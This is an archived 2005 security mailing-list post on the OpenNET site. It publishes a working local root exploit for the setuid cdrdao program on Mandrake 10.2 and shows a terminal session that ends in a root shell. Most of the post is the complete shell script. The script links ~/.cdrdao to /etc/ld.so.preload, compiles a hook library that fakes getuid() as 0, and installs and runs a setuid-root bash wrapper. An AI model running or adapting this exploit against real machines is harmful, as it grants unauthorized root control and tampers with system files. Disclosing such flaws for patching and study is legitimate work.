The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


cdrdao exploit for mandrake 10.2 ( Mandriva 2005)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 16 May 2005 03:09:10 -0000
From: newbug Tseng <newbug@chroot.org.>
To: [email protected]
Subject: cdrdao exploit for mandrake 10.2 ( Mandriva 2005)
X-Virus-Scanned: antivirus-gw at tyumen.ru



Hi.
Seems cdrdao vulnerability still exist in Mandrake 10.2 (Mandriva 2005).
I've no idea why Mandrake always forgot to fix this vulnerability ...
Anyway, hope Mandrike will fix this vulnerability as soon as possible.

--- screenshot ---
[newbug@t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug@t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug@t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
!@#$@%#$%#$%!@%^
[+] Congratulation, You win the game !!
[root@t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root@t43 tmp]# 
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org 
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org" 
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@%#$%#$%!@%^"
/tmp/sh
--- end of cdrdao_exp.sh ---


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру